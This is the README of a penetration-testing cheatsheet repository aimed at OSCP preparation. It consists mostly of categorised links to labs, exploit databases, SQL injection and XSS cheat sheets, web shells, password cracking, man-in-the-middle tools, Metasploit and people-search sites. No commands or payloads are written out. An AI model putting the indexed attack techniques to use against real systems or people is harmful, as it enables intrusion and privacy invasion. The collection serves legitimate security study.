text
stringlengths 9
334k
|
---|
<p align="center">
<img src="https://user-images.githubusercontent.com/25066959/67897219-5128a480-fb34-11e9-8cca-423a9dd6973f.png" width="256" title="Github Logo">
![STARS](https://img.shields.io/github/stars/OlivierLaflamme/Cheatsheet-God?style=social)
![FORKS](https://img.shields.io/github/forks/OlivierLaflamme/Cheatsheet-God?style=social)
![INFO](https://img.shields.io/badge/Cheatsheet-OSCP%2FPTX-red)
![CC](https://img.shields.io/badge/license-cc--by--sa--4.0--Licence-blue)
![COMMIT](https://img.shields.io/github/last-commit/OlivierLaflamme/Cheatsheet-God)
![SIZE](https://img.shields.io/github/repo-size/OlivierLaflamme/Cheatsheet-God)
```diff
+ UPDATE: Added my huge link of bookmarks / references ❤️
```
*Do you have a million bookmarks saved? Do all of those bookmarks contain unique information? Github repos starred for later?*
Well this is a compilation of all of these resources into a single repo known as **Cheatsheet-God**. No more need for bookmarked links. No need to open a web browser. Its all here for you.
This is a collection of resources, scripts and easy to follow how-to's. I have been gathering (and continuing to gather) in preparation for the OSCP as well as for general pentesting. Feel free to use however you want!
All contributions are welcomed! If you feel like you can contribute and make these documents more complete, please do! I'll acknowledge you.
### If you would like to improve anything, and add to this repo, PLEASE DO!
Here's what you do:
1. Create Issue Request describing your `enhancement`
2. Fork this repository
3. Push some code to your fork
4. Come back to this repository and open a PR
5. After some review, get that PR merged to master
6. Make sure to update Issue Request so that I can credit you! You ROCK!
Feel free to also open an issue with any questions, help wanted, or requests!
## Acknowledgments
* Inspiration: Making a cheatsheet god would be proud of using.
* Hat tip to anyone who ever contributed :shipit:
-> Much thanks to [MrTsRex](https://github.com/MrTsRex) for Cheatsheet_Windows.txt enumerating Windows version vulnerabilities
-> Much thanks to [susmithaaa](https://github.com/susmithaaa) for his contribution to Cheatsheet_PenTesting.txt password attacks section
-> Much thanks to [akshaycbor](https://github.com/akshaycbor) for his contribution to Cheatsheet_MobileAppTesting.txt regarding apk repackaging instructions
## More
#### WeChat Official Account
A_Can_Of_Tuna
![Webp net-resizeimage](https://user-images.githubusercontent.com/25066959/68775780-0c554100-05fd-11ea-8ed2-3d7d6ff37576.jpg)
## Get Some Practice
[Hack The Box](https://www.hackthebox.eu/)
[Attack Defense 1000+ Labs!](https://attackdefense.com/)<br>
[VulnHub](https://www.vulnhub.com/)<br>
[Root.me](https://www.root-me.org/)<br>
[Penetration Testing Practice Lab / Vulnerable Apps/Systems ](https://www.amanhardikar.com/mindmaps/Practice.html)<br>
[Vulhub](https://vulhub.org/)<br>
[Vulapps](http://vulapps.evalbug.com/)<br>
[Vulnspy](https://www.vulnspy.com/)<br>
[Upload-Labs](https://github.com/c0ny1/upload-labs)<br>
[TryHackMe](https://tryhackme.com/)<br>
## BLOGS
https://scriptkidd1e.wordpress.com/oscp-journey/
http://www.securitysift.com/offsec-pwb-oscp/
http://ch3rn0byl.com/down-with-oscp-yea-you-know-me/
http://www.techexams.net/forums/security-certifications/110760-oscp-jollyfrogs-tale.html
http://hackingandsecurity.blogspot.com
Http://carnal0wnage.blogspot.com/
Http://www.mcgrewsecurity.com/
Http://www.gnucitizen.org/blog/
Http://www.darknet.org.uk/
Http://spylogic.net/
Http://taosecurity.blogspot.com/
Http://www.room362.com/
Http://blog.sipvicious.org/
Http://blog.portswigger.net/
Http://pentestmonkey.net/blog/
Http://jeremiahgrossman.blogspot.com/
Http://i8jesus.com/
Http://blog.c22.cc/
Http://www.skullsecurity.org/blog/
Http://blog.metasploit.com/
Http://www.darkoperator.com/
Http://blog.skeptikal.org/
Http://preachsecurity.blogspot.com/
Http://www.tssci-security.com/
Http://www.gdssecurity.com/l/b/
Http://websec.wordpress.com/
Http://bernardodamele.blogspot.com/
Http://laramies.blogspot.com/
Http://www.spylogic.net/
Http://blog.andlabs.org/
Http://xs-sniper.com/blog/
Http://www.commonexploits.com/
Http://www.sensepost.com/blog/
Http://wepma.blogspot.com/
Http://exploit.co.il/
Http://securityreliks.wordpress.com/
Http://www.madirish.net/index.html
Http://sirdarckcat.blogspot.com/
Http://reusablesec.blogspot.com/
Http://myne-us.blogspot.com/
Http://www.notsosecure.com/
Http://blog.spiderlabs.com/
Http://www.corelan.be/
Http://www.digininja.org/
Http://www.pauldotcom.com/
Http://www.attackvector.org/
Http://deviating.net/
Http://www.alphaonelabs.com/
Http://www.smashingpasswords.com/
Http://wirewatcher.wordpress.com/
Http://gynvael.coldwind.pl/
Http://www.nullthreat.net/
Http://www.question-defense.com/
Http://archangelamael.blogspot.com/
Http://memset.wordpress.com/
Http://sickness.tor.hu/
Http://punter-infosec.com/
Http://www.securityninja.co.uk/
Http://securityandrisk.blogspot.com/
Http://esploit.blogspot.com/
Http://www.pentestit.com/
## FORUMS
Http://sla.ckers.org/forum/index.php
Http://www.ethicalhacker.net/
Http://www.backtrack-linux.org/forums/
Http://www.elitehackers.info/forums/
Http://www.hackthissite.org/forums/index.php
Http://securityoverride.com/forum/index.php
Http://www.iexploit.org/
Http://bright-shadows.net/
Http://www.governmentsecurity.org/forum/
Http://forum.intern0t.net/
## MAGAZINES
Http://www.net-security.org/insecuremag.php
Http://hakin9.org/
## VIDEO
Http://www.hackernews.com/
Http://www.securitytube.net/
Http://www.irongeek.com/i.php?page=videos/aide-winter-2011
Http://avondale.good.net/dl/bd/
Http://achtbaan.nikhef.nl/27c3-stream/releases/mkv/
http://www.youtube.com/user/ChRiStIaAn008
http://www.youtube.com/user/HackingCons
https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA
https://www.youtube.com/channel/UCCkVMojdBWS-JtH7TliWkVg
https://www.youtube.com/channel/UCW6MNdOsqv2E9AjQkv9we7A
https://www.youtube.com/channel/UCFmjA6dnjv-phqrFACyI8tw
https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w
https://www.youtube.com/user/RootOfTheNull
https://www.youtube.com/channel/UCMACXuWd2w6_IEGog744UaA
## METHODOLOGIES
http://www.vulnerabilityassessment.co.uk/Penetration%20Test.html
http://www.pentest-standard.org/index.php/Main_Page
http://projects.webappsec.org/w/page/13246978/Threat-Classification
http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
Http://www.social-engineer.org/
## PRESENTATIONS
Http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-part-1-social-networks/
http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-%E2%80%93-part-2-blogs-message-boards-and-metadata/
Http://www.spylogic.net/2009/10/enterprise-open-source-intelligence-gathering-part-3-monitoring/
http://www.slideshare.net/Laramies/tactical-information-gathering
Http://www.sans.org/reading_room/whitepapers/privacy/document_metadata_the_silent_killer__32974
Http://infond.blogspot.com/2010/05/toturial-footprinting.html
## PEOPLE AND ORGANIZATIONAL
Http://www.spokeo.com/
Http://www.123people.com/
Http://www.xing.com/
Http://www.zoominfo.com/search
Http://pipl.com/
Http://www.zabasearch.com/
Http://www.searchbug.com/default.aspx
Http://theultimates.com/
Http://skipease.com/
Http://addictomatic.com/
Http://socialmention.com/
Http://entitycube.research.microsoft.com/
Http://www.yasni.com/
Http://tweepz.com/
Http://tweepsearch.com/
Http://www.glassdoor.com/index.htm
Http://www.jigsaw.com/
http://searchwww.sec.gov/EDGARFSClient/jsp/EDGAR_MainAccess.jsp
Http://www.tineye.com/
Http://www.peekyou.com/
Http://picfog.com/
Http://twapperkeeper.com/index.php
## INFRASTRUCTURE
Http://uptime.netcraft.com/
Http://www.serversniff.net/
Http://www.domaintools.com/
Http://centralops.net/co/
Http://hackerfantastic.com/
Http://whois.webhosting.info/
Https://www.ssllabs.com/ssldb/analyze.html
Http://www.clez.net/
Http://www.my-ip-neighbors.com/
Http://www.shodanhq.com/
Http://www.exploit-db.com/google-dorks/
Http://www.hackersforcharity.org/ghdb/
EXPLOITS AND ADVISORIES
Http://www.exploit-db.com/
Http://www.cvedetails.com/
Http://www.packetstormsecurity.org/
http://www.securityforest.com/wiki/index.php/Main_Page
Http://www.securityfocus.com/bid
Http://nvd.nist.gov/
Http://osvdb.org/
http://www.nullbyte.org.il/Index.html
Http://secdocs.lonerunners.net/
http://www.phenoelit-us.org/whatSAP/index.html
Http://secunia.com/
Http://cve.mitre.org/
CHEATSHEETS AND SYNTAX
Http://www.cheat-sheets.org/
Http://blog.securitymonks.com/2009/08/15/whats-in-your-folder-security-cheat-sheets/
## AGILE HACKING
Http://www.gnucitizen.org/blog/agile-hacking-a-homegrown-telnet-based-portscanner/
Http://blog.commandlinekungfu.com/
Http://www.securityaegis.com/simple-yet-effective-directory-bruteforcing/
Http://isc.sans.edu/diary.html?storyid=2376
Http://isc.sans.edu/diary.html?storyid=1229
Http://ss64.com/nt/
Http://pauldotcom.com/2010/02/running-a-command-on-every-mac.html
Http://synjunkie.blogspot.com/2008/03/command-line-ninjitsu.html
Http://www.zonbi.org/2010/06/09/wmic-the-other-other-white-meat/
Http://rstcenter.com/forum/22324-hacking-without-tools-windows.rst
http://www.coresecurity.com/files/attachments/Core_Define_and_Win_Cmd_Line.pdf
http://www.scribd.com/Penetration-Testing-Ninjitsu2-Infrastructure-and-Netcat-without-Netcat/d/3064507
Http://www.pentesterscripting.com/
Http://www.sans.org/reading_room/whitepapers/hackers/windows-script-host-hack-windows_33583
http://www.blackhat.com/presentations/bh-dc-10/Bannedit/BlackHat-DC-2010-Bannedit-Advanced-Command-Injection-Exploitation-1-wp.pdf
## OS AND SCRIPTS
http://en.wikipedia.org/wiki/IPv4_subnetting_reference
Http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/
Http://shelldorado.com/shelltips/beginner.html
Http://www.linuxsurvival.com/
http://mywiki.wooledge.org/BashPitfalls
Http://rubular.com/
Http://www.iana.org/assignments/port-numbers
Http://www.robvanderwoude.com/ntadmincommands.php
Http://www.nixtutor.com/linux/all-the-best-linux-cheat-sheets/
## TOOLS
Http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
http://www.secguru.com/files/cheatsheet/nessusNMAPcheatSheet.pdf
http://sbdtools.googlecode.com/files/hping3_cheatsheet_v1.0-ENG.pdf
http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf
Http://www.sans.org/security-resources/sec560/misc_tools_sheet_v1.pdf
http://rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html
Http://h.ackack.net/cheat-sheets/netcat
## DISTROS
Http://www.backtrack-linux.org/
Http://www.matriux.com/
Http://samurai.inguardians.com/
http://www.owasp.org/index.php/Category:OWASP_Live_CD_Project
Https://pentoo.ch/
Http://www.hackfromacave.com/articles_and_adventures/katana_v2_release.html
Http://www.piotrbania.com/all/kon-boot/
Http://www.linuxfromscratch.org/
Http://sumolinux.suntzudata.com/
Http://blog.0x0e.org/2009/11/20/pentesting-with-an-ubuntu-box/#comments
Http://www.backbox.org/
## LABS ISOS AND VMS
Http://sourceforge.net/projects/websecuritydojo/
http://code.google.com/p/owaspbwa/wiki/ProjectSummary
Http://heorot.net/livecds/
Http://informatica.uv.es/~carlos/docencia/netinvm/
Http://www.bonsai-sec.com/en/research/moth.php
Http://blog.metasploit.com/2010/05/introducing-metasploitable.html
Http://pynstrom.net/holynix.php
Http://gnacktrack.co.uk/download.php
Http://sourceforge.net/projects/lampsecurity/files/
Https://www.hacking-lab.com/news/newspage/livecd-v4.3-available.html
Http://sourceforge.net/projects/virtualhacking/files/
Http://www.badstore.net/
Http://www.irongeek.com/i.php?page=security/mutillidae-deliberately-vulnerable-php-owasp-top-10
Http://www.dvwa.co.uk/
Http://sourceforge.net/projects/thebutterflytmp/
## VULNERABLE SOFTWARE
Http://www.oldapps.com/
Http://www.oldversion.com/
Http://www.exploit-db.com/webapps/
Http://code.google.com/p/wavsep/downloads/list
http://www.owasp.org/index.php/Owasp_SiteGenerator
Http://www.mcafee.com/us/downloads/free-tools/hacmebooks.aspx
Http://www.mcafee.com/us/downloads/free-tools/hacme-casino.aspx
Http://www.mcafee.com/us/downloads/free-tools/hacmeshipping.aspx
Http://www.mcafee.com/us/downloads/free-tools/hacmetravel.aspx
## TEST SITES
Http://www.webscantest.com/
http://crackme.cenzic.com/Kelev/view/home.php
http://zero.webappsecurity.com/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Http://testaspnet.vulnweb.com/
Http://testasp.vulnweb.com/
Http://testphp.vulnweb.com/
Http://demo.testfire.net/
Http://hackme.ntobjectives.com/
## EXPLOITATION INTRO
Http://myne-us.blogspot.com/2010/08/from-0x90-to-0x4c454554-journey-into.html
Http://www.mgraziano.info/docs/stsi2010.pdf
Http://www.abysssec.com/blog/2010/05/past-present-future-of-windows-exploitation/
Http://www.ethicalhacker.net/content/view/122/2/
http://code.google.com/p/it-sec-catalog/wiki/Exploitation
Http://x9090.blogspot.com/2010/03/tutorial-exploit-writting-tutorial-from.html
Http://ref.x86asm.net/index.html
## REVERSE ENGINEERING & MALWARE
http://www.woodmann.com/TiGa/idaseries.html
Http://www.binary-auditing.com/
Http://visi.kenshoto.com/
Http://www.radare.org/y/
Http://www.offensivecomputing.net/
## PASSWORDS AND HASHES
Http://www.irongeek.com/i.php?page=videos/password-exploitation-class
Http://cirt.net/passwords
Http://sinbadsecurity.blogspot.com/2008/10/ms-sql-server-password-recovery.html
Http://www.foofus.net/~jmk/medusa/medusa-smbnt.html
Http://www.foofus.net/?page_id=63
Http://hashcrack.blogspot.com/
Http://www.nirsoft.net/articles/saved_password_location.html
Http://www.onlinehashcrack.com/
Http://www.md5this.com/list.php?
Http://www.virus.org/default-password
Http://www.phenoelit-us.org/dpl/dpl.html
Http://news.electricalchemy.net/2009/10/cracking-passwords-in-cloud.html
## WORDLISTS
Http://contest.korelogic.com/wordlists.html
http://packetstormsecurity.org/Crackers/wordlists/
http://www.skullsecurity.org/wiki/index.php/Passwords
Http://www.ericheitzman.com/passwd/passwords/
## PASS THE HASH
Http://www.sans.org/reading_room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation_33283
Http://www.sans.org/reading_room/whitepapers/testing/crack-pass-hash_33219
Http://carnal0wnage.blogspot.com/2008/03/using-pash-hash-toolkit.html
## MITM
Http://www.giac.org/certified_professionals/practicals/gsec/0810.php
http://www.linuxsecurity.com/docs/PDF/dsniff-n-mirror.pdf
Http://www.cs.uiuc.edu/class/sp08/cs498sh/slides/dsniff.pdf
Http://www.techvibes.com/blog/a-hackers-story-let-me-tell-you-just-how-easily-i-can-steal-your-personal-data
http://www.mindcenter.net/uploads/ECCE101.pdf
Http://toorcon.org/pres12/3.pdf
http://media.techtarget.com/searchUnifiedCommunications/downloads/Seven_Deadliest_UC_Attacks_Ch3.pdf
Http://packetstormsecurity.org/papers/wireless/cracking-air.pdf
Http://www.blackhat.com/presentations/bh-europe-03/bh-europe-03-valleri.pdf
http://www.oact.inaf.it/ws-ssri/Costa.pdf
Http://www.defcon.org/images/defcon-17/dc-17-presentations/defcon-17-sam_bowne-hijacking_web_2.0.pdf
http://mcafeeseminar.com/focus/downloads/Live_Hacking.pdf
http://www.seanobriain.com/docs/PasstheParcel-MITMGuide.pdf
http://www.more.net/sites/default/files/2010JohnStrandKeynote.pdf
http://www.leetupload.com/database/Misc/Papers/Asta%20la%20Vista/18.Ettercap_Spoof.pdf
http://bandwidthco.com/whitepapers/netforensics/arp/EtterCap%20ARP%20Spoofing%20&%20Beyond.pdf
http://bandwidthco.com/whitepapers/netforensics/arp/Fun%20With%20EtterCap%20Filters.pdf
http://www.iac.iastate.edu/iasg/libarchive/0910/The_Magic_of_Ettercap/The_Magic_of_Ettercap.pdf
Http://articles.manugarg.com/arp_spoofing.pdf
http://academy.delmar.edu/Courses/ITSY2430/eBooks/Ettercap(ManInTheMiddleAttack-tool).pdf
http://www.ucci.it/docs/ICTSecurity-2004-26.pdf
http://web.mac.com/opticrealm/iWeb/asurobot/My%20Cyber%20Attack%20Papers/My%20Cyber%20Attack%20Papers_files/ettercap_Nov_6_2005-1.pdf
Http://blog.spiderlabs.com/2010/12/thicknet.html
Http://www.hackyeah.com/2010/10/ettercap-filters-with-metasploit-browser_autopwn/
Http://www.go4expert.com/forums/showthread.php?t=11842
Http://www.irongeek.com/i.php?page=security/ettercapfilter
Http://openmaniak.com/ettercap_filter.php
Http://www.irongeek.com/i.php?page=videos/dns-spoofing-with-ettercap-pharming
Http://www.irongeek.com/i.php?page=videos/ettercap-plugins-find-ip-gw-discover-isolate
Http://www.irongeek.com/i.php?page=videos/ettercapfiltervid1
Http://spareclockcycles.org/2010/06/10/sergio-proxy-released/
## TOOLS OSINT
http://www.edge-security.com/theHarvester.php
Http://www.mavetju.org/unix/dnstracer-man.php
Http://www.paterva.com/web5/
## Metadata
Http://www.sans.org/reading_room/whitepapers/privacy/document-metadata-silent-killer_32974
Http://lcamtuf.coredump.cx/strikeout/
Http://www.sno.phy.queensu.ca/~phil/exiftool/
Http://www.edge-security.com/metagoofil.php
Http://www.darkoperator.com/blog/2009/4/24/metadata-enumeration-with-foca.html
## GOOGLE HACKING
Http://www.stachliu.com/index.php/resources/tools/google-hacking-diggity-project/
Http://midnightresearch.com/projects/search-engine-assessment-tool/#downloads
Http://sqid.rubyforge.org/#next
http://voidnetwork.org/5ynL0rd/darkc0de/python_script/dorkScan.html
## WEB
Http://www.bindshell.net/tools/beef
Http://blindelephant.sourceforge.net/
Http://xsser.sourceforge.net/
Http://sourceforge.net/projects/rips-scanner/
Http://www.divineinvasion.net/authforce/
Http://andlabs.org/tools.html#sotf
http://www.taddong.com/docs/Browser_Exploitation_for_Fun&Profit_Taddong-RaulSiles_Nov2010_v1.1.pdf
Http://carnal0wnage.blogspot.com/2007/07/using-sqid-sql-injection-digger-to-look.html
Http://code.google.com/p/pinata-csrf-tool/
Http://xsser.sourceforge.net/#intro
Http://www.contextis.co.uk/resources/tools/clickjacking-tool/
Http://packetstormsecurity.org/files/view/69896/unicode-fun.txt
Http://sourceforge.net/projects/ws-attacker/files/
Https://github.com/koto/squid-imposter
## ATTACK STRINGS
Http://code.google.com/p/fuzzdb/
http://www.owasp.org/index.php/Category:OWASP_Fuzzing_Code_Database#tab=Statements
## SHELLS
Http://sourceforge.net/projects/yokoso/
Http://sourceforge.net/projects/ajaxshell/
## SCANNERS
Http://w3af.sourceforge.net/
Http://code.google.com/p/skipfish/
Http://sqlmap.sourceforge.net/
Http://sqid.rubyforge.org/#next
http://packetstormsecurity.org/UNIX/scanners/XSSscan.py.txt
http://code.google.com/p/fimap/wiki/WindowsAttack
Http://code.google.com/p/fm-fsf/
## PROXIES Burp
Http://www.sans.org/reading_room/whitepapers/testing/fuzzing-approach-credentials-discovery-burp-intruder_33214
Http://www.gdssecurity.com/l/b/2010/08/10/constricting-the-web-the-gds-burp-api/
Http://sourceforge.net/projects/belch/files/
Http://www.securityninja.co.uk/application-security/burp-suite-tutorial-repeater-and-comparer-tools
Http://blog.ombrepixel.com/
Http://andlabs.org/tools.html#dser
Http://feoh.tistory.com/22
Http://www.sensepost.com/labs/tools/pentest/reduh
http://www.owasp.org/index.php/OWASP_WebScarab_NG_Project
Http://intrepidusgroup.com/insight/mallory/
Http://www.fiddler2.com/fiddler2/
http://websecuritytool.codeplex.com/documentation?referringTitle=Home
http://translate.google.com/translate?hl=en&sl=es&u=http://xss.codeplex.com/releases/view/43170&prev=/search%3Fq%3Dhttp://www.hackingeek.com/2010/08/x5s-encuentra-fallos-xss-lfi-rfi-en-tus.html%26hl%3Den&rurl=translate.google.com&twu=1
## SOCIAL ENGINEERING
Http://www.secmaniac.com/
## PASSWORD
Http://nmap.org/ncrack/
Http://www.foofus.net/~jmk/medusa/medusa.html
Http://www.openwall.com/john/
Http://ophcrack.sourceforge.net/
Http://blog.0x3f.net/tool/keimpx-in-action/
Http://code.google.com/p/keimpx/
Http://sourceforge.net/projects/hashkill/
## METASPLOIT
Http://www.indepthdefense.com/2009/02/reverse-pivots-with-metasploit-how-not.html
http://code.google.com/p/msf-hack/wiki/WmapNikto
Http://www.indepthdefense.com/2009/01/metasploit-visual-basic-payloads-in.html
Http://seclists.org/metasploit/
Http://pauldotcom.com/2010/03/nessus-scanning-through-a-meta.html
Http://meterpreter.illegalguy.hostzi.com/
Http://blog.metasploit.com/2010/03/automating-metasploit-console.html
Http://www.workrobot.com/sansfire2009/561.html
Http://www.securitytube.net/video/711
http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient#download
Http://vimeo.com/16852783
Http://milo2012.wordpress.com/2009/09/27/xlsinjector/
Http://www.fastandeasyhacking.com/
Http://trac.happypacket.net/
http://www.blackhat.com/presentations/bh-dc-10/Ames_Colin/BlackHat-DC-2010-colin-david-neurosurgery-with-meterpreter-wp.pdf
http://www.blackhat.com/presentations/bh-dc-10/Egypt/BlackHat-DC-2010-Egypt-UAV-slides.pdf
http://www.offensive-security.com/metasploit-unleashed/Metasploit_Unleashed_Information_Security_Training
Http://www.irongeek.com/i.php?page=videos/metasploit-class
Http://www.ethicalhacker.net/component/option,com_smf/Itemid,54/topic,6158.0/
Http://vimeo.com/16925188
Http://www.ustream.tv/recorded/13396511
Http://www.ustream.tv/recorded/13397426
Http://www.ustream.tv/recorded/13398740
## MSF Exploits or Easy
Http://www.nessus.org/plugins/index.php?view=single&id=12204
Http://www.nessus.org/plugins/index.php?view=single&id=11413
Http://www.nessus.org/plugins/index.php?view=single&id=18021
Http://www.nessus.org/plugins/index.php?view=single&id=26918
Http://www.nessus.org/plugins/index.php?view=single&id=34821
Http://www.nessus.org/plugins/index.php?view=single&id=22194
Http://www.nessus.org/plugins/index.php?view=single&id=34476
Http://www.nessus.org/plugins/index.php?view=single&id=25168
Http://www.nessus.org/plugins/index.php?view=single&id=19408
Http://www.nessus.org/plugins/index.php?view=single&id=21564
Http://www.nessus.org/plugins/index.php?view=single&id=10862
Http://www.nessus.org/plugins/index.php?view=single&id=26925
Http://www.nessus.org/plugins/index.php?view=single&id=29314
Http://www.nessus.org/plugins/index.php?view=single&id=23643
Http://www.nessus.org/plugins/index.php?view=single&id=12052
Http://www.nessus.org/plugins/index.php?view=single&id=12052
Http://www.nessus.org/plugins/index.php?view=single&id=34477
Http://www.nessus.org/plugins/index.php?view=single&id=15962
Http://www.nessus.org/plugins/index.php?view=single&id=42106
Http://www.nessus.org/plugins/index.php?view=single&id=15456
Http://www.nessus.org/plugins/index.php?view=single&id=21689
Http://www.nessus.org/plugins/index.php?view=single&id=12205
Http://www.nessus.org/plugins/index.php?view=single&id=22182
Http://www.nessus.org/plugins/index.php?view=single&id=26919
Http://www.nessus.org/plugins/index.php?view=single&id=26921
Http://www.nessus.org/plugins/index.php?view=single&id=21696
Http://www.nessus.org/plugins/index.php?view=single&id=40887
Http://www.nessus.org/plugins/index.php?view=single&id=10404
Http://www.nessus.org/plugins/index.php?view=single&id=18027
Http://www.nessus.org/plugins/index.php?view=single&id=19402
Http://www.nessus.org/plugins/index.php?view=single&id=11790
Http://www.nessus.org/plugins/index.php?view=single&id=12209
Http://www.nessus.org/plugins/index.php?view=single&id=10673
## NSE
Http://www.securitytube.net/video/931
Http://nmap.org/nsedoc/
## NET SCANNERS AND SCRIPTS
Http://nmap.org/
Http://asturio.gmxhome.de/software/sambascan2/i.html
Http://www.softperfect.com/products/networkscanner/
Http://www.openvas.org/
Http://tenable.com/products/nessus
Http://www.rapid7.com/vulnerability-scanner.jsp
Http://www.eeye.com/products/retina/community
## POST EXPLOITATION
Http://www.awarenetwork.org/home/rattle/source/python/exe2bat.py
Http://www.phx2600.org/archive/2008/08/29/metacab/
Http://www.room362.com/blog/2011/9/6/post-exploitation-command-lists.html
## NETCAT
Http://readlist.com/lists/insecure.org/nmap-dev/1/7779.html
Http://www.radarhack.com/tutorial/ads.pdf
http://www.infosecwriters.com/text_resources/pdf/Netcat_for_the_Masses_DDebeer.pdf
Http://www.sans.org/security-resources/sec560/netcat_cheat_sheet_v1.pdf
Http://www.dest-unreach.org/socat/
Http://www.antionline.com/archive/index.php/t-230603.html
Http://technotales.wordpress.com/2009/06/14/netcat-tricks/
Http://seclists.org/nmap-dev/2009/q1/581
Http://www.terminally-incoherent.com/blog/2007/08/07/few-useful-netcat-tricks/
http://www.inguardians.com/research/docs/Skoudis_pentestsecrets.pdf
Http://gse-compliance.blogspot.com/2008/07/netcat.html
## SOURCE INSPECTION
Http://www.justanotherhacker.com/projects/graudit.html
Http://code.google.com/p/javasnoop/
## FIREFOX ADDONS
https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/?src=collection
https://addons.mozilla.org/en-US/firefox/addon/web-developer/?src=collection
https://addons.mozilla.org/en-CA/firefox/addon/cookie-quick-manager/
https://addons.mozilla.org/en-CA/firefox/addon/hackbartool/
## TOOL LISTINGS
Http://packetstormsecurity.org/files/tags/tool
http://tools.securitytube.net/index.php?title=Main_Page
## TRAINING/CLASSES SEC/HACKING
Http://pentest.cryptocity.net/
Http://www.irongeek.com/i.php?page=videos/network-sniffers-class
http://samsclass.info/124/124_Sum09.shtml
Http://www.cs.ucsb.edu/~vigna/courses/cs279/
Http://crypto.stanford.edu/cs142/
Http://crypto.stanford.edu/cs155/
Http://cseweb.ucsd.edu/classes/wi09/cse227/
Http://www-inst.eecs.berkeley.edu/~cs161/sp11/
http://security.ucla.edu/pages/Security_Talks
Http://www.cs.rpi.edu/academics/courses/spring10/csci4971/
Http://cr.yp.to/2004-494.html
Http://www.ece.cmu.edu/~dbrumley/courses/18732-f09/
Https://noppa.tkk.fi/noppa/kurssi/t-110.6220/luennot
Http://stuff.mit.edu/iap/2009/#websecurity
## PROGRAMMING Python
Http://code.google.com/edu/languages/google-python-class/index.html
http://www.swaroopch.com/notes/Python_en: Table_of_Contents
http://www.thenewboston.com/?cat=40&pOpen=tutorial
Http://showmedo.com/videotutorials/python
Http://www.catonmat.net/blog/learning-python-programming-language-through-video-lectures/
## PROGRAMMING Ruby
Http://www.tekniqal.com/
## OTHER MISC
Http://www.cs.sjtu.edu.cn/~kzhu/cs490/
Https://noppa.tkk.fi/noppa/kurssi/t-110.6220/luennot/
http://i-web.iu-tokyo.ac.jp/edu/training/ss/lecture/new-documents/Lectures/
Http://resources.infosecinstitute.com/
Http://vimeo.com/user2720399
## WEB VECTORS SQLI
Http://pentestmonkey.net/blog/mssql-sql-injection-cheat-sheet/
Http://isc.sans.edu/diary.html?storyid=9397
Http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
Http://www.evilsql.com/main/index.php
Http://xd-blog.com.ar/descargas/manuales/bugs/full-mssql-injection-pwnage.html
http://securityoverride.com/articles.php?article_id=1&article=The_Complete_Guide_to_SQL_Injections
Http://websec.wordpress.com/2010/03/19/exploiting-hard-filtered-sql-injections/
Http://sqlzoo.net/hack/
Http://www.sqlteam.com/article/sql-server-versions
Http://www.krazl.com/blog/?p=3
http://www.owasp.org/index.php/Testing_for_MS_Access
http://web.archive.org/web/20101112061524/http://seclists.org/pen-test/2003/May/0074.html
http://web.archive.org/web/20080822123152/http://www.webapptest.org/ms-access-sql-injection-cheat-sheet-EN.html
http://www.youtube.com/watch?v=WkHkryIoLD0
http://layerone.info/archives/2009/Joe%20McCray%20-%20Advanced%20SQL%20Injection%20-%20L1%202009.pdf
Http://vimeo.com/3418947
Http://sla.ckers.org/forum/read.php?24,33903
Http://websec.files.wordpress.com/2010/11/sqli2.pdf
Http://old.justinshattuck.com/2007/01/18/mysql-injection-cheat-sheet/
Http://ha.ckers.org/sqlinjection/
http://lab.mediaservice.net/notes_more.php?id=MSSQL
## WEB VECTORS UPLOAD TRICKS
Http://www.google.com/#hl=en&q=bypassing+upload+file+type&start=40&sa=N&fp=a2bb30ecf4f91972
Http://blog.skeptikal.org/2009/11/adobe-responds-sort-of.html
Http://blog.insicdesigns.com/2009/01/secure-file-upload-in-php-web-applications/
Http://perishablepress.com/press/2006/01/10/stupid-htaccess-tricks/
Http://ex.ploit.net/f20/tricks-tips-bypassing-image-uploaders-t3hmadhatt3r-38/
Http://www.ravenphpscripts.com/article2974.html
Http://www.acunetix.com/cross-site-scripting/scanner.htm
Http://www.vupen.com/english/advisories/2009/3634
Http://msdn.microsoft.com/en-us/library/aa478971.aspx
Http://dev.tangocms.org/issues/237
http://seclists.org/fulldisclosure/2006/Jun/508
Http://www.gnucitizen.org/blog/cross-site-file-upload-attacks/
http://www.ipolicynetworks.com/technology/files/TikiWiki_jhot.php_Script_File_Upload_Security_Bypass_Vulnerability.html
http://shsc.info/FileUploadSecurity
## WEB VECTORS LFI/RFI
Http://pastie.org/840199
Http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
Http://www.notsosecure.com/folder2/2010/08/20/lfi-code-exec-remote-root/?utm_source=twitterfeed&utm_medium=twitter
Http://labs.neohapsis.com/2008/07/21/local-file-inclusion-%E2%80%93-tricks-of-the-trade/
Http://www.digininja.org/blog/when_all_you_can_do_is_read.php
## WEB VECTORS XSS
Http://www.infosecwriters.com/hhworld/hh8/csstut.htm
http://www.technicalinfo.net/papers/CSS.html
Http://msmvps.com/blogs/alunj/archive/2010/07/07/1773441.aspx
Http://forum.intern0t.net/web-hacking-war-games/112-cross-site-scripting-attack-defense-guide.html
https://media.blackhat.com/bh-eu-10/presentations/Lindsay_Nava/BlackHat-EU-2010-Lindsay-Nava-IE8-XSS-Filters-slides.pdf
Http://sirdarckcat.blogspot.com/2009/08/our-favorite-xss-filters-and-how-to.html
Http://www.securityaegis.com/filter-evasion-houdini-on-the-wire/
Http://heideri.ch/jso/#javascript
Http://www.reddit.com/r/xss/
Http://sla.ckers.org/forum/list.php?2
## COLDFUSION
Http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
http://zastita.com/02114/Attacking_ColdFusion..html
